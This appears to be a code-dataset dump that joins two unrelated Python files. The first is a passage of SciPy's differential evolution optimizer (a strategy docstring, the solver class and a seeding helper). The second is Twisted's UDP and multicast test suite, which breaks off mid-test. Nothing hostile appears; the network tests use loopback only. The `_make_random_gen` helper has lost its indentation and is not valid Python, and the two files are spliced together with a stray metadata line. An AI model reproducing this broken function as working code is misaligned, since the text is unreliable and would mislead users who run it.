        - 'best1bin'
        - 'best1exp'
        - 'rand1exp'
        - 'randtobest1exp'
        - 'best2exp'
        - 'rand2exp'
        - 'randtobest1bin'
        - 'best2bin'
        - 'rand2bin'
        - 'rand1bin'
        The default is 'best1bin'
    maxiter : int, optional
        The maximum number of generations over which the entire population is
        evolved. The maximum number of function evaluations (with no polishing)
        is: ``(maxiter + 1) * popsize * len(x)``
    popsize : int, optional
        A multiplier for setting the total population size. The population has
        ``popsize * len(x)`` individuals.
    tol : float, optional
        When the mean of the population energies, multiplied by tol,
        divided by the standard deviation of the population energies
        is greater than 1 the solving process terminates:
        ``convergence = mean(pop) * tol / stdev(pop) > 1``
    mutation : float or tuple(float, float), optional
        The mutation constant. In the literature this is also known as
        differential weight, being denoted by F.
        If specified as a float it should be in the range [0, 2].
        If specified as a tuple ``(min, max)`` dithering is employed. Dithering
        randomly changes the mutation constant on a generation by generation
        basis. The mutation constant for that generation is taken from
        U[min, max). Dithering can help speed convergence significantly.
        Increasing the mutation constant increases the search radius, but will
        slow down convergence.
    recombination : float, optional
        The recombination constant, should be in the range [0, 1]. In the
        literature this is also known as the crossover probability, being
        denoted by CR. Increasing this value allows a larger number of mutants
        to progress into the next generation, but at the risk of population
        stability.
    seed : int or `np.random.RandomState`, optional
        If `seed` is not specified the `np.random.RandomState` singleton is
        used.
        If `seed` is an int, a new `np.random.RandomState` instance is used,
        seeded with `seed`.
        If `seed` is already a `np.random.RandomState` instance, then that
        `np.random.RandomState` instance is used.
        Specify `seed` for repeatable minimizations.
    disp : bool, optional
        Display status messages
    callback : callable, `callback(xk, convergence=val)`, optional
        A function to follow the progress of the minimization. ``xk`` is
        the current value of ``x0``. ``val`` represents the fractional
        value of the population convergence. When ``val`` is greater than one
        the function halts. If callback returns `True`, then the minimization
        is halted (any polishing is still carried out).
    polish : bool, optional
        If True, then `scipy.optimize.minimize` with the `L-BFGS-B` method
        is used to polish the best population member at the end. This requires
        a few more function evaluations.
    maxfun : int, optional
        Set the maximum number of function evaluations. However, it probably
        makes more sense to set `maxiter` instead.
    init : string, optional
        Specify which type of population initialization is performed. Should be
        one of:
        - 'latinhypercube'
        - 'random'
    """
    # Dispatch of mutation strategy method (binomial or exponential).
    # Membership in one of these two dicts also decides which crossover
    # scheme _mutate applies ('bin' -> binomial, 'exp' -> exponential).
    _binomial = {'best1bin': '_best1',
                 'randtobest1bin': '_randtobest1',
                 'best2bin': '_best2',
                 'rand2bin': '_rand2',
                 'rand1bin': '_rand1'}
    _exponential = {'best1exp': '_best1',
                    'rand1exp': '_rand1',
                    'randtobest1exp': '_randtobest1',
                    'best2exp': '_best2',
                    'rand2exp': '_rand2'}
    def __init__(self, func, bounds, args=(),
                 strategy='best1bin', maxiter=1000, popsize=15,
                 tol=0.01, mutation=(0.5, 1), recombination=0.7, seed=None,
                 maxfun=np.inf, callback=None, disp=False, polish=True,
                 init='latinhypercube'):
        # Resolve the strategy name to the bound mutation method via the
        # dispatch tables above.
        if strategy in self._binomial:
            self.mutation_func = getattr(self, self._binomial[strategy])
        elif strategy in self._exponential:
            self.mutation_func = getattr(self, self._exponential[strategy])
        else:
            raise ValueError("Please select a valid mutation strategy")
        self.strategy = strategy
        self.callback = callback
        self.polish = polish
        self.tol = tol
        # Mutation constant should be in [0, 2). If specified as a sequence
        # then dithering is performed.
        self.scale = mutation
        if (not np.all(np.isfinite(mutation)) or
                np.any(np.array(mutation) >= 2) or
                np.any(np.array(mutation) < 0)):
            raise ValueError('The mutation constant must be a float in '
                             'U[0, 2), or specified as a tuple(min, max)'
                             ' where min < max and min, max are in U[0, 2).')
        self.dither = None
        if hasattr(mutation, '__iter__') and len(mutation) > 1:
            # Dithering: a fresh scale is drawn from U[min, max) each
            # generation (see __next__). sort() guarantees min <= max.
            self.dither = [mutation[0], mutation[1]]
            self.dither.sort()
        self.cross_over_probability = recombination
        self.func = func
        self.args = args
        # convert tuple of lower and upper bounds to limits
        # [(low_0, high_0), ..., (low_n, high_n)]
        # -> [[low_0, ..., low_n], [high_0, ..., high_n]]
        self.limits = np.array(bounds, dtype='float').T
        if (np.size(self.limits, 0) != 2 or not
                np.all(np.isfinite(self.limits))):
            raise ValueError('bounds should be a sequence containing '
                             'real valued (min, max) pairs for each value'
                             ' in x')
        if maxiter is None:  # the default used to be None
            maxiter = 1000
        self.maxiter = maxiter
        if maxfun is None:  # the default used to be None
            maxfun = np.inf
        self.maxfun = maxfun
        # population is scaled to between [0, 1].
        # We have to scale between parameter <-> population
        # save these arguments for _scale_parameter and
        # _unscale_parameter. This is an optimization
        self.__scale_arg1 = 0.5 * (self.limits[0] + self.limits[1])
        self.__scale_arg2 = np.fabs(self.limits[0] - self.limits[1])
        self.parameter_count = np.size(self.limits, 1)
        self.random_number_generator = _make_random_gen(seed)
        # default population initialization is a latin hypercube design, but
        # there are other population initializations possible.
        self.num_population_members = popsize * self.parameter_count
        self.population_shape = (self.num_population_members,
                                 self.parameter_count)
        self._nfev = 0
        if init == 'latinhypercube':
            self.init_population_lhs()
        elif init == 'random':
            self.init_population_random()
        else:
            raise ValueError("The population initialization method must be one"
                             "of 'latinhypercube' or 'random'")
        self.disp = disp
    def init_population_lhs(self):
        """
        Initializes the population with Latin Hypercube Sampling.
        Latin Hypercube Sampling ensures that each parameter is uniformly
        sampled over its range.
        """
        rng = self.random_number_generator
        # Each parameter range needs to be sampled uniformly. The scaled
        # parameter range ([0, 1)) needs to be split into
        # `self.num_population_members` segments, each of which has the following
        # size:
        segsize = 1.0 / self.num_population_members
        # Within each segment we sample from a uniform random distribution.
        # We need to do this sampling for each parameter.
        samples = (segsize * rng.random_sample(self.population_shape)
        # Offset each segment to cover the entire parameter range [0, 1)
                   + np.linspace(0., 1., self.num_population_members,
                                 endpoint=False)[:, np.newaxis])
        # Create an array for population of candidate solutions.
        self.population = np.zeros_like(samples)
        # Initialize population of candidate solutions by permutation of the
        # random samples. Each column (parameter) is shuffled independently,
        # which keeps exactly one sample per segment per parameter.
        for j in range(self.parameter_count):
            order = rng.permutation(range(self.num_population_members))
            self.population[:, j] = samples[order, j]
        # reset population energies: np.inf marks "not yet evaluated"
        self.population_energies = (np.ones(self.num_population_members) *
                                    np.inf)
        # reset number of function evaluations counter
        self._nfev = 0
    def init_population_random(self):
        """
        Initialises the population at random. This type of initialization
        can possess clustering, Latin Hypercube sampling is generally better.
        """
        rng = self.random_number_generator
        self.population = rng.random_sample(self.population_shape)
        # reset population energies: np.inf marks "not yet evaluated"
        self.population_energies = (np.ones(self.num_population_members) *
                                    np.inf)
        # reset number of function evaluations counter
        self._nfev = 0
    @property
    def x(self):
        """
        The best solution from the solver
        Returns
        -------
        x : ndarray
            The best solution from the solver.
        """
        # population[0] is maintained as the best member (see
        # _calculate_population_energies and __next__).
        return self._scale_parameters(self.population[0])
    @property
    def convergence(self):
        """
        The standard deviation of the population energies divided by their
        mean.
        """
        # _MACHEPS guards against division by zero when the mean energy is 0.
        return (np.std(self.population_energies) /
                np.abs(np.mean(self.population_energies) + _MACHEPS))
    def solve(self):
        """
        Runs the DifferentialEvolutionSolver.
        Returns
        -------
        res : OptimizeResult
            The optimization result represented as a ``OptimizeResult`` object.
            Important attributes are: ``x`` the solution array, ``success`` a
            Boolean flag indicating if the optimizer exited successfully and
            ``message`` which describes the cause of the termination. See
            `OptimizeResult` for a description of other attributes. If `polish`
            was employed, and a lower minimum was obtained by the polishing,
            then OptimizeResult also contains the ``jac`` attribute.
        """
        nit, warning_flag = 0, False
        status_message = _status_message['success']
        # The population may have just been initialized (all entries are
        # np.inf). If it has you have to calculate the initial energies.
        # Although this is also done in the evolve generator it's possible
        # that someone can set maxiter=0, at which point we still want the
        # initial energies to be calculated (the following loop isn't run).
        if np.all(np.isinf(self.population_energies)):
            self._calculate_population_energies()
        # do the optimisation.
        for nit in range(1, self.maxiter + 1):
            # evolve the population by a generation
            try:
                next(self)
            except StopIteration:
                # raised by __next__ when the maxfun budget is exhausted
                warning_flag = True
                status_message = _status_message['maxfev']
                break
            if self.disp:
                print("differential_evolution step %d: f(x)= %g"
                      % (nit,
                         self.population_energies[0]))
            # stop when the fractional s.d. of the population is less than tol
            # of the mean energy
            convergence = self.convergence
            if (self.callback and
                    self.callback(self._scale_parameters(self.population[0]),
                                  convergence=self.tol / convergence) is True):
                warning_flag = True
                status_message = ('callback function requested stop early '
                                  'by returning True')
                break
            if convergence < self.tol or warning_flag:
                break
        else:
            # for/else: the loop ran to completion without converging
            status_message = _status_message['maxiter']
            warning_flag = True
        DE_result = OptimizeResult(
            x=self.x,
            fun=self.population_energies[0],
            nfev=self._nfev,
            nit=nit,
            message=status_message,
            success=(warning_flag is not True))
        if self.polish:
            # refine the best member with a local gradient-based search
            result = minimize(self.func,
                              np.copy(DE_result.x),
                              method='L-BFGS-B',
                              bounds=self.limits.T,
                              args=self.args)
            self._nfev += result.nfev
            DE_result.nfev = self._nfev
            # only adopt the polished point if it is actually better
            if result.fun < DE_result.fun:
                DE_result.fun = result.fun
                DE_result.x = result.x
                DE_result.jac = result.jac
                # to keep internal state consistent
                self.population_energies[0] = result.fun
                self.population[0] = self._unscale_parameters(result.x)
        return DE_result
    def _calculate_population_energies(self):
        """
        Calculate the energies of all the population members at the same time.
        Puts the best member in first place. Useful if the population has just
        been initialised.
        """
        for index, candidate in enumerate(self.population):
            if self._nfev > self.maxfun:
                break
            parameters = self._scale_parameters(candidate)
            self.population_energies[index] = self.func(parameters,
                                                        *self.args)
            self._nfev += 1
        minval = np.argmin(self.population_energies)
        # put the lowest energy into the best solution position (index 0),
        # swapping both the energies and the corresponding population rows.
        lowest_energy = self.population_energies[minval]
        self.population_energies[minval] = self.population_energies[0]
        self.population_energies[0] = lowest_energy
        self.population[[0, minval], :] = self.population[[minval, 0], :]
    def __iter__(self):
        return self
    def __next__(self):
        """
        Evolve the population by a single generation
        Returns
        -------
        x : ndarray
            The best solution from the solver.
        fun : float
            Value of objective function obtained from the best solution.
        """
        # the population may have just been initialized (all entries are
        # np.inf). If it has you have to calculate the initial energies
        if np.all(np.isinf(self.population_energies)):
            self._calculate_population_energies()
        if self.dither is not None:
            # draw a fresh mutation constant from U[min, max) each generation
            self.scale = (self.random_number_generator.rand()
                          * (self.dither[1] - self.dither[0]) + self.dither[0])
        for candidate in range(self.num_population_members):
            if self._nfev > self.maxfun:
                # function-evaluation budget exhausted; solve() treats this
                # as the 'maxfev' termination condition
                raise StopIteration
            # create a trial solution
            trial = self._mutate(candidate)
            # ensuring that it's in the range [0, 1)
            self._ensure_constraint(trial)
            # scale from [0, 1) to the actual parameter value
            parameters = self._scale_parameters(trial)
            # determine the energy of the objective function
            energy = self.func(parameters, *self.args)
            self._nfev += 1
            # if the energy of the trial candidate is lower than the
            # original population member then replace it
            if energy < self.population_energies[candidate]:
                self.population[candidate] = trial
                self.population_energies[candidate] = energy
                # if the trial candidate also has a lower energy than the
                # best solution then replace that as well
                if energy < self.population_energies[0]:
                    self.population_energies[0] = energy
                    self.population[0] = trial
        return self.x, self.population_energies[0]
    def next(self):
        """
        Evolve the population by a single generation
        Returns
        -------
        x : ndarray
            The best solution from the solver.
        fun : float
            Value of objective function obtained from the best solution.
        """
        # next() is required for compatibility with Python2.7.
        return self.__next__()
    def _scale_parameters(self, trial):
        """
        scale from a number between 0 and 1 to parameters.
        """
        # midpoint + (offset from centre) * range; see __init__ for the
        # precomputed __scale_arg1 (midpoint) and __scale_arg2 (range).
        return self.__scale_arg1 + (trial - 0.5) * self.__scale_arg2
    def _unscale_parameters(self, parameters):
        """
        scale from parameters to a number between 0 and 1.
        """
        # exact inverse of _scale_parameters
        return (parameters - self.__scale_arg1) / self.__scale_arg2 + 0.5
    def _ensure_constraint(self, trial):
        """
        make sure the parameters lie between the limits
        """
        # out-of-range entries are resampled uniformly rather than clipped
        for index, param in enumerate(trial):
            if param > 1 or param < 0:
                trial[index] = self.random_number_generator.rand()
    def _mutate(self, candidate):
        """
        create a trial vector based on a mutation strategy
        """
        trial = np.copy(self.population[candidate])
        rng = self.random_number_generator
        # random starting parameter index for the crossover
        fill_point = rng.randint(0, self.parameter_count)
        if (self.strategy == 'randtobest1exp' or
                self.strategy == 'randtobest1bin'):
            # randtobest1 is the only strategy that needs the candidate index
            bprime = self.mutation_func(candidate,
                                        self._select_samples(candidate, 5))
        else:
            bprime = self.mutation_func(self._select_samples(candidate, 5))
        if self.strategy in self._binomial:
            crossovers = rng.rand(self.parameter_count)
            crossovers = crossovers < self.cross_over_probability
            # the last one is always from the bprime vector for binomial
            # If you fill in modulo with a loop you have to set the last one to
            # true. If you don't use a loop then you can have any random entry
            # be True.
            crossovers[fill_point] = True
            trial = np.where(crossovers, bprime, trial)
            return trial
        elif self.strategy in self._exponential:
            # exponential crossover: copy a contiguous (modulo) run of
            # parameters from bprime, stopping at the first failed draw
            i = 0
            while (i < self.parameter_count and
                   rng.rand() < self.cross_over_probability):
                trial[fill_point] = bprime[fill_point]
                fill_point = (fill_point + 1) % self.parameter_count
                i += 1
            return trial
    def _best1(self, samples):
        """
        best1bin, best1exp
        """
        r0, r1 = samples[:2]
        return (self.population[0] + self.scale *
                (self.population[r0] - self.population[r1]))
    def _rand1(self, samples):
        """
        rand1bin, rand1exp
        """
        r0, r1, r2 = samples[:3]
        return (self.population[r0] + self.scale *
                (self.population[r1] - self.population[r2]))
    def _randtobest1(self, candidate, samples):
        """
        randtobest1bin, randtobest1exp
        """
        r0, r1 = samples[:2]
        bprime = np.copy(self.population[candidate])
        bprime += self.scale * (self.population[0] - bprime)
        bprime += self.scale * (self.population[r0] -
                                self.population[r1])
        return bprime
    def _best2(self, samples):
        """
        best2bin, best2exp
        """
        r0, r1, r2, r3 = samples[:4]
        bprime = (self.population[0] + self.scale *
                  (self.population[r0] + self.population[r1] -
                   self.population[r2] - self.population[r3]))
        return bprime
    def _rand2(self, samples):
        """
        rand2bin, rand2exp
        """
        r0, r1, r2, r3, r4 = samples
        bprime = (self.population[r0] + self.scale *
                  (self.population[r1] + self.population[r2] -
                   self.population[r3] - self.population[r4]))
        return bprime
    def _select_samples(self, candidate, number_samples):
        """
        obtain random integers from range(self.num_population_members),
        without replacement. You can't have the original candidate either.
        """
        idxs = list(range(self.num_population_members))
        idxs.remove(candidate)
        self.random_number_generator.shuffle(idxs)
        idxs = idxs[:number_samples]
        return idxs
def _make_random_gen(seed):
"""Turn seed into a np.random.RandomState instance
If seed is None, return the RandomState singleton used by np.random.
If seed is an int, return a new RandomState instance seeded with seed.
If seed is already a RandomState instance, return it.
Otherwise raise ValueError.
"""
if seed is None or seed is np.random:
return np.random.mtrand._rand
if isinstance(seed, (numbers.Integral, np.integer)):
return np.random.RandomState(seed)
if isinstance(seed, np.random.RandomState):
return seed
raise ValueError('%r cannot be used to seed a numpy.random.RandomState'
' instance' % seed) | unknown | codeparrot/codeparrot-clean | ||
# -*- test-case-name: twisted.test.test_udp -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for implementations of L{IReactorUDP} and L{IReactorMulticast}.
"""
from twisted.trial import unittest
from twisted.internet.defer import Deferred, gatherResults, maybeDeferred
from twisted.internet import protocol, reactor, error, defer, interfaces, udp
from twisted.python import runtime
class Mixin:
    """
    Shared bookkeeping for the test datagram protocols: records whether the
    protocol was started/stopped, accumulates received packets, and fires an
    optional Deferred once the transport begins listening.
    """
    started = 0
    stopped = 0
    startedDeferred = None
    def __init__(self):
        # Datagrams delivered to this protocol, in arrival order.
        self.packets = []
    def startProtocol(self):
        self.started = 1
        deferred = self.startedDeferred
        if deferred is not None:
            # Clear the attribute before firing so a later restart can
            # install a fresh Deferred without it being fired twice.
            self.startedDeferred = None
            deferred.callback(None)
    def stopProtocol(self):
        self.stopped = 1
class Server(Mixin, protocol.DatagramProtocol):
    # Deferred fired (with None) when the next datagram arrives, if set.
    packetReceived = None
    refused = 0
    def datagramReceived(self, data, addr):
        # Record every datagram as a (payload, peer address) pair.
        self.packets.append((data, addr))
        if self.packetReceived is not None:
            # Fire-once: clear the Deferred before calling back so the
            # callback can safely install a new one.
            d, self.packetReceived = self.packetReceived, None
            d.callback(None)
class Client(Mixin, protocol.ConnectedDatagramProtocol):
    # Deferred fired (with None) when the next datagram arrives, if set.
    packetReceived = None
    refused = 0
    def datagramReceived(self, data):
        # Connected protocol: only the payload is delivered, no address.
        self.packets.append(data)
        if self.packetReceived is not None:
            # Fire-once: clear before calling back.
            d, self.packetReceived = self.packetReceived, None
            d.callback(None)
    def connectionFailed(self, failure):
        # Propagate the failure through startedDeferred (if a test is
        # waiting on it) and keep it for later inspection.
        if self.startedDeferred is not None:
            d, self.startedDeferred = self.startedDeferred, None
            d.errback(failure)
        self.failure = failure
    def connectionRefused(self):
        # ICMP port-unreachable: errback any waiting Deferred and set a flag.
        if self.startedDeferred is not None:
            d, self.startedDeferred = self.startedDeferred, None
            d.errback(error.ConnectionRefusedError("yup"))
        self.refused = 1
class GoodClient(Server):
    # A Server variant that also reacts to connection refusal, for tests
    # which connect the transport to an unreachable port.
    def connectionRefused(self):
        if self.startedDeferred is not None:
            # Errback any Deferred a test is waiting on, then flag refusal.
            d, self.startedDeferred = self.startedDeferred, None
            d.errback(error.ConnectionRefusedError("yup"))
        self.refused = 1
class BadClientError(Exception):
    """
    Exception deliberately raised by L{BadClient.datagramReceived} on every
    call, so tests can verify the reactor survives (and logs) application
    errors raised from datagram delivery.
    """
class BadClient(protocol.DatagramProtocol):
    """
    A DatagramProtocol which always raises an exception from datagramReceived.
    Used to test error handling behavior in the reactor for that method.
    """
    # Deferred fired with the received bytes just before the exception is
    # raised, if one has been installed via setDeferred.
    d = None
    def setDeferred(self, d):
        """
        Set the Deferred which will be called back when datagramReceived is
        called.
        """
        self.d = d
    def datagramReceived(self, bytes, addr):
        if self.d is not None:
            # Fire-once: clear the Deferred before calling back.
            d, self.d = self.d, None
            d.callback(bytes)
        # Always raise so the reactor's error handling is exercised.
        raise BadClientError("Application code is very buggy!")
class UDPTestCase(unittest.TestCase):
    """
    Tests for the UDP implementation of L{IReactorUDP}: listening, rebinding,
    sending/receiving datagrams, connection refusal, and error handling in
    C{datagramReceived}.
    """
    def test_oldAddress(self):
        """
        The C{type} of the host address of a listening L{DatagramProtocol}'s
        transport is C{"UDP"}.
        """
        server = Server()
        d = server.startedDeferred = defer.Deferred()
        p = reactor.listenUDP(0, server, interface="127.0.0.1")
        def cbStarted(ignored):
            addr = p.getHost()
            self.assertEqual(addr.type, 'UDP')
            return p.stopListening()
        return d.addCallback(cbStarted)
    def test_startStop(self):
        """
        The L{DatagramProtocol}'s C{startProtocol} and C{stopProtocol}
        methods are called when its transports starts and stops listening,
        respectively.
        """
        server = Server()
        d = server.startedDeferred = defer.Deferred()
        port1 = reactor.listenUDP(0, server, interface="127.0.0.1")
        def cbStarted(ignored):
            self.assertEqual(server.started, 1)
            self.assertEqual(server.stopped, 0)
            return port1.stopListening()
        def cbStopped(ignored):
            self.assertEqual(server.stopped, 1)
        return d.addCallback(cbStarted).addCallback(cbStopped)
    def test_rebind(self):
        """
        Re-listening with the same L{DatagramProtocol} re-invokes the
        C{startProtocol} callback.
        """
        server = Server()
        d = server.startedDeferred = defer.Deferred()
        p = reactor.listenUDP(0, server, interface="127.0.0.1")
        def cbStarted(ignored, port):
            return port.stopListening()
        def cbStopped(ignored):
            # Listen a second time with the same protocol instance; the
            # returned Deferred fires (via startProtocol) once it has
            # restarted, then the new port is stopped again.
            d = server.startedDeferred = defer.Deferred()
            p = reactor.listenUDP(0, server, interface="127.0.0.1")
            return d.addCallback(cbStarted, p)
        # BUG FIX: cbStopped was defined but never chained, so the
        # re-listen half of this test never ran. Chain it after the first
        # port has stopped listening.
        return d.addCallback(cbStarted, p).addCallback(cbStopped)
    def test_bindError(self):
        """
        A L{CannotListenError} exception is raised when attempting to bind a
        second protocol instance to an already bound port
        """
        server = Server()
        d = server.startedDeferred = defer.Deferred()
        port = reactor.listenUDP(0, server, interface='127.0.0.1')
        def cbStarted(ignored):
            self.assertEqual(port.getHost(), server.transport.getHost())
            server2 = Server()
            self.assertRaises(
                error.CannotListenError,
                reactor.listenUDP, port.getHost().port, server2,
                interface='127.0.0.1')
        d.addCallback(cbStarted)
        def cbFinished(ignored):
            return port.stopListening()
        d.addCallback(cbFinished)
        return d
    def test_sendPackets(self):
        """
        Datagrams can be sent with the transport's C{write} method and
        received via the C{datagramReceived} callback method.
        """
        server = Server()
        serverStarted = server.startedDeferred = defer.Deferred()
        port1 = reactor.listenUDP(0, server, interface="127.0.0.1")
        client = GoodClient()
        clientStarted = client.startedDeferred = defer.Deferred()
        def cbServerStarted(ignored):
            # Only start the client once the server is listening.
            self.port2 = reactor.listenUDP(0, client, interface="127.0.0.1")
            return clientStarted
        d = serverStarted.addCallback(cbServerStarted)
        def cbClientStarted(ignored):
            client.transport.connect("127.0.0.1",
                                     server.transport.getHost().port)
            cAddr = client.transport.getHost()
            sAddr = server.transport.getHost()
            serverSend = client.packetReceived = defer.Deferred()
            server.transport.write("hello", (cAddr.host, cAddr.port))
            # Exercise the three write signatures of a connected transport:
            # implicit address, explicit None, and an explicit address.
            clientWrites = [
                ("a",),
                ("b", None),
                ("c", (sAddr.host, sAddr.port))]
            def cbClientSend(ignored):
                if clientWrites:
                    nextClientWrite = server.packetReceived = defer.Deferred()
                    nextClientWrite.addCallback(cbClientSend)
                    client.transport.write(*clientWrites.pop(0))
                    return nextClientWrite
            # No one will ever call .errback on either of these Deferreds,
            # but there is a non-trivial amount of test code which might
            # cause them to fail somehow.  So fireOnOneErrback=True.
            return defer.DeferredList([
                cbClientSend(None),
                serverSend],
                fireOnOneErrback=True)
        d.addCallback(cbClientStarted)
        def cbSendsFinished(ignored):
            cAddr = client.transport.getHost()
            sAddr = server.transport.getHost()
            self.assertEqual(
                client.packets,
                [("hello", (sAddr.host, sAddr.port))])
            clientAddr = (cAddr.host, cAddr.port)
            self.assertEqual(
                server.packets,
                [("a", clientAddr),
                 ("b", clientAddr),
                 ("c", clientAddr)])
        d.addCallback(cbSendsFinished)
        def cbFinished(ignored):
            return defer.DeferredList([
                defer.maybeDeferred(port1.stopListening),
                defer.maybeDeferred(self.port2.stopListening)],
                fireOnOneErrback=True)
        d.addCallback(cbFinished)
        return d
    def test_connectionRefused(self):
        """
        A L{ConnectionRefusedError} exception is raised when a connection
        attempt is actively refused by the other end.
        Note: This test assumes no one is listening on port 80 UDP.
        """
        client = GoodClient()
        clientStarted = client.startedDeferred = defer.Deferred()
        port = reactor.listenUDP(0, client, interface="127.0.0.1")
        server = Server()
        serverStarted = server.startedDeferred = defer.Deferred()
        port2 = reactor.listenUDP(0, server, interface="127.0.0.1")
        d = defer.DeferredList(
            [clientStarted, serverStarted],
            fireOnOneErrback=True)
        def cbStarted(ignored):
            connectionRefused = client.startedDeferred = defer.Deferred()
            client.transport.connect("127.0.0.1", 80)
            # UDP is unreliable; send several datagrams so at least one
            # triggers the ICMP port-unreachable response.
            for i in range(10):
                client.transport.write(str(i))
                server.transport.write(str(i), ("127.0.0.1", 80))
            return self.assertFailure(
                connectionRefused,
                error.ConnectionRefusedError)
        d.addCallback(cbStarted)
        def cbFinished(ignored):
            return defer.DeferredList([
                defer.maybeDeferred(port.stopListening),
                defer.maybeDeferred(port2.stopListening)],
                fireOnOneErrback=True)
        d.addCallback(cbFinished)
        return d
    def test_badConnect(self):
        """
        A call to the transport's connect method fails with a L{ValueError}
        when a non-IP address is passed as the host value.
        A call to a transport's connect method fails with a L{RuntimeError}
        when the transport is already connected.
        """
        client = GoodClient()
        port = reactor.listenUDP(0, client, interface="127.0.0.1")
        self.assertRaises(ValueError, client.transport.connect,
                          "localhost", 80)
        client.transport.connect("127.0.0.1", 80)
        self.assertRaises(RuntimeError, client.transport.connect,
                          "127.0.0.1", 80)
        return port.stopListening()
    def test_datagramReceivedError(self):
        """
        When datagramReceived raises an exception it is logged but the port
        is not disconnected.
        """
        finalDeferred = defer.Deferred()
        def cbCompleted(ign):
            """
            Flush the exceptions which the reactor should have logged and make
            sure they're actually there.
            """
            errs = self.flushLoggedErrors(BadClientError)
            self.assertEqual(len(errs), 2, "Incorrectly found %d errors, expected 2" % (len(errs),))
        finalDeferred.addCallback(cbCompleted)
        client = BadClient()
        port = reactor.listenUDP(0, client, interface='127.0.0.1')
        def cbCleanup(result):
            """
            Disconnect the port we started and pass on whatever was given to us
            in case it was a Failure.
            """
            return defer.maybeDeferred(port.stopListening).addBoth(lambda ign: result)
        finalDeferred.addBoth(cbCleanup)
        addr = port.getHost()
        # UDP is not reliable.  Try to send as many as 60 packets before giving
        # up.  Conceivably, all sixty could be lost, but they probably won't be
        # unless all UDP traffic is being dropped, and then the rest of these
        # UDP tests will likely fail as well.  Ideally, this test (and probably
        # others) wouldn't even use actual UDP traffic: instead, they would
        # stub out the socket with a fake one which could be made to behave in
        # whatever way the test desires.  Unfortunately, this is hard because
        # of differences in various reactor implementations.
        attempts = range(60)
        succeededAttempts = []
        def makeAttempt():
            """
            Send one packet to the listening BadClient.  Set up a 0.1 second
            timeout to do re-transmits in case the packet is dropped.  When two
            packets have been received by the BadClient, stop sending and let
            the finalDeferred's callbacks do some assertions.
            """
            if not attempts:
                try:
                    self.fail("Not enough packets received")
                except:
                    finalDeferred.errback()
            self.failIfIdentical(client.transport, None, "UDP Protocol lost its transport")
            packet = str(attempts.pop(0))
            packetDeferred = defer.Deferred()
            client.setDeferred(packetDeferred)
            client.transport.write(packet, (addr.host, addr.port))
            def cbPacketReceived(packet):
                """
                A packet arrived.  Cancel the timeout for it, record it, and
                maybe finish the test.
                """
                timeoutCall.cancel()
                succeededAttempts.append(packet)
                if len(succeededAttempts) == 2:
                    # The second error has not yet been logged, since the
                    # exception which causes it hasn't even been raised yet.
                    # Give the datagramReceived call a chance to finish, then
                    # let the test finish asserting things.
                    reactor.callLater(0, finalDeferred.callback, None)
                else:
                    makeAttempt()
            def ebPacketTimeout(err):
                """
                The packet wasn't received quickly enough.  Try sending another
                one.  It doesn't matter if the packet for which this was the
                timeout eventually arrives: makeAttempt throws away the
                Deferred on which this function is the errback, so when
                datagramReceived callbacks, so it won't be on this Deferred, so
                it won't raise an AlreadyCalledError.
                """
                makeAttempt()
            packetDeferred.addCallbacks(cbPacketReceived, ebPacketTimeout)
            packetDeferred.addErrback(finalDeferred.errback)
            timeoutCall = reactor.callLater(
                0.1, packetDeferred.errback,
                error.TimeoutError(
                    "Timed out in testDatagramReceivedError"))
        makeAttempt()
        return finalDeferred
    def test_portRepr(self):
        """
        The port number being listened on can be found in the string
        returned from calling repr() on L{twisted.internet.udp.Port}.
        """
        client = GoodClient()
        p = reactor.listenUDP(0, client)
        portNo = str(p.getHost().port)
        self.failIf(repr(p).find(portNo) == -1)
        def stoppedListening(ign):
            # Once stopped, the port number must no longer appear in repr().
            self.failIf(repr(p).find(portNo) != -1)
        d = defer.maybeDeferred(p.stopListening)
        d.addCallback(stoppedListening)
        return d
    def test_NoWarningOnBroadcast(self):
        """
        C{'<broadcast>'} is an alternative way to say C{'255.255.255.255'}
        ({socket.gethostbyname("<broadcast>")} returns C{'255.255.255.255'}),
        so because it becomes a valid IP address, no deprecation warning about
        passing hostnames to L{twisted.internet.udp.Port.write} needs to be
        emitted by C{write()} in this case.
        """
        class fakeSocket:
            def sendto(self, foo, bar):
                pass
        p = udp.Port(0, Server())
        p.socket = fakeSocket()
        p.write("test", ("<broadcast>", 1234))
        warnings = self.flushWarnings([self.test_NoWarningOnBroadcast])
        self.assertEqual(len(warnings), 0)
class ReactorShutdownInteraction(unittest.TestCase):
    """Test reactor shutdown interaction"""
    def setUp(self):
        """Start a UDP port"""
        self.server = Server()
        self.port = reactor.listenUDP(0, self.server, interface='127.0.0.1')
    def tearDown(self):
        """Stop the UDP port"""
        return self.port.stopListening()
    def testShutdownFromDatagramReceived(self):
        """Test reactor shutdown while in a recvfrom() loop"""
        # udp.Port's doRead calls recvfrom() in a loop, as an optimization.
        # It is important this loop terminate under various conditions.
        # Previously, if datagramReceived synchronously invoked
        # reactor.stop(), under certain reactors, the Port's socket would
        # synchronously disappear, causing an AttributeError inside that
        # loop.  This was mishandled, causing the loop to spin forever.
        # This test is primarily to ensure that the loop never spins
        # forever.
        finished = defer.Deferred()
        pr = self.server.packetReceived = defer.Deferred()
        def pktRece(ignored):
            # Simulate reactor.stop() behavior :(
            self.server.transport.connectionLost()
            # Then delay this Deferred chain until the protocol has been
            # disconnected, as the reactor should do in an error condition
            # such as we are inducing.  This is very much a whitebox test.
            reactor.callLater(0, finished.callback, None)
        pr.addCallback(pktRece)
        def flushErrors(ignored):
            # We are breaking abstraction and calling private APIs, any
            # number of horrible errors might occur.  As long as the reactor
            # doesn't hang, this test is satisfied.  (There may be room for
            # another, stricter test.)
            self.flushLoggedErrors()
        finished.addCallback(flushErrors)
        # Loop the datagram back to ourselves to trigger datagramReceived.
        self.server.transport.write('\0' * 64, ('127.0.0.1',
                                    self.server.transport.getHost().port))
        return finished
class MulticastTestCase(unittest.TestCase):
    """Tests for multicast UDP transports (L{IReactorMulticast})."""

    def setUp(self):
        """Create a multicast server and client and connect the client."""
        self.server = Server()
        self.client = Client()
        # multicast won't work if we listen over loopback, apparently
        self.port1 = reactor.listenMulticast(0, self.server)
        self.port2 = reactor.listenMulticast(0, self.client)
        self.client.transport.connect(
            "127.0.0.1", self.server.transport.getHost().port)

    def tearDown(self):
        """Stop listening on both multicast ports."""
        return gatherResults([
            maybeDeferred(self.port1.stopListening),
            maybeDeferred(self.port2.stopListening)])

    def testTTL(self):
        """The multicast TTL defaults to 1 and can be changed."""
        for o in self.client, self.server:
            self.assertEqual(o.transport.getTTL(), 1)
            o.transport.setTTL(2)
